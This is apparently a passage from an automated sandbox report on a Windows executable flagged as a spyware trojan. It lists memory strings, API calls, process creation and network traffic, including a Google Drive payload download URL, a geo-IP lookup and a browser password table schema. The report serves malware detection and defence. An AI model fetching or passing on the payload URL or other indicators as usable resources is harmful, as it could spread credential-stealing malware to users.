            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.000000000633D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.000000000633D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2960783839.0000000007D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcGM
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2400153476.0000000006389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2400153476.0000000006389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/W13-
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2400153476.0000000006389000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006354000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG&export=download
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2400153476.0000000006389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1B-BzDxVYtSOJvWTazDI-d1HSDB0YMNcG&export=downloadX
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980898260.0000000036750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: xXUnP7uCBJ.exe, 00000005.00000003.2365084079.000000000638F000.00000004.00000020.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000003.2365163291.000000000638F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.8:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49867 version: TLS 1.2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_701A1B5F0_2_701A1B5F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00404DCC5_2_00404DCC
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00406AF25_2_00406AF2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_001743285_2_00174328
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00178DA05_2_00178DA0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00175F905_2_00175F90
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00172DD15_2_00172DD1
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC21305_2_38FC2130
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC03AF5_2_38FC03AF
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC33185_2_38FC3318
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCCCA05_2_38FCCCA0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCC6385_2_38FCC638
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC76285_2_38FC7628
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCB07F5_2_38FCB07F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCF0545_2_38FCF054
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC78485_2_38FC7848
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCC1F25_2_38FCC1F2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC69CB5_2_38FC69CB
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCB9305_2_38FCB930
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCAAE85_2_38FCAAE8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCDA895_2_38FCDA89
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC6A435_2_38FC6A43
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCEBF25_2_38FCEBF2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCE3475_2_38FCE347
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCB4EC5_2_38FCB4EC
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCCCA25_2_38FCCCA2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCBD9C5_2_38FCBD9C
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCDEE15_2_38FCDEE1
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC6EA05_2_38FC6EA0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC6E915_2_38FC6E91
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FC7E1E5_2_38FC7E1E
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCE79F5_2_38FCE79F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956A9B05_2_3956A9B0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956A3605_2_3956A360
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39569D105_2_39569D10
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956BDF05_2_3956BDF0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395686505_2_39568650
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395696C85_2_395696C8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395621085_2_39562108
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956F1305_2_3956F130
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395651F85_2_395651F8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395629B85_2_395629B8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956A9A05_2_3956A9A0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395618585_2_39561858
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395600405_2_39560040
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395618485_2_39561848
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395670705_2_39567070
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395670615_2_39567061
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395648205_2_39564820
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395620F85_2_395620F8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956A3525_2_3956A352
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395663585_2_39566358
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39567B4F5_2_39567B4F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395663685_2_39566368
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39563B185_2_39563B18
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39563B085_2_39563B08
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395643C85_2_395643C8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395632585_2_39563258
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395632685_2_39563268
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395652085_2_39565208
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956BA975_2_3956BA97
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39565AB85_2_39565AB8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39565AA85_2_39565AA8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956255F5_2_3956255F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395625605_2_39562560
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39569D005_2_39569D00
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39564DB25_2_39564DB2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39564DB05_2_39564DB0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39566C185_2_39566C18
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395614005_2_39561400
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39566C095_2_39566C09
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395674C85_2_395674C8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39561CB05_2_39561CB0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395674B85_2_395674B8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39561CA05_2_39561CA0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39563F725_2_39563F72
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39563F705_2_39563F70
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39565F105_2_39565F10
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395667C05_2_395667C0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956AFF75_2_3956AFF7
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956AFF85_2_3956AFF8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956AFE85_2_3956AFE8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395667B05_2_395667B0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39560FA85_2_39560FA8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395656505_2_39565650
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_3956565F5_2_3956565F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395686405_2_39568640
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395656605_2_39565660
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39562E105_2_39562E10
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39562E005_2_39562E00
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395636C25_2_395636C2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395636C05_2_395636C0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_395696B85_2_395696B8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39560EB95_2_39560EB9
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39A96FA05_2_39A96FA0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39A9E7C85_2_39A9E7C8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39A9D6085_2_39A9D608
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_39A983285_2_39A98328
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: String function: 00402C41 appears 51 times
            Source: xXUnP7uCBJ.exe, 00000000.00000000.1687519057.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs xXUnP7uCBJ.exe
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2960421938.0000000006371000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs xXUnP7uCBJ.exe
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2980758974.0000000036587000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs xXUnP7uCBJ.exe
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs xXUnP7uCBJ.exe
            Source: xXUnP7uCBJ.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs xXUnP7uCBJ.exe
            Source: xXUnP7uCBJ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeMutant created: NULL
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile created: C:\Users\user\AppData\Local\Temp\nsqC0CA.tmpJump to behavior
            Source: xXUnP7uCBJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: xXUnP7uCBJ.exe, 00000005.00000002.2982590020.00000000376FD000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000367D3000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000367F4000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000367C5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000367B5000.00000004.00000800.00020000.00000000.sdmp, xXUnP7uCBJ.exe, 00000005.00000002.2980898260.00000000367E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xXUnP7uCBJ.exeVirustotal: Detection: 57%
            Source: xXUnP7uCBJ.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeFile read: C:\Users\user\Desktop\xXUnP7uCBJ.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\xXUnP7uCBJ.exe "C:\Users\user\Desktop\xXUnP7uCBJ.exe"
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess created: C:\Users\user\Desktop\xXUnP7uCBJ.exe "C:\Users\user\Desktop\xXUnP7uCBJ.exe"
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeProcess created: C:\Users\user\Desktop\xXUnP7uCBJ.exe "C:\Users\user\Desktop\xXUnP7uCBJ.exe"Jump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeSection loaded: version.dllJump to behavior
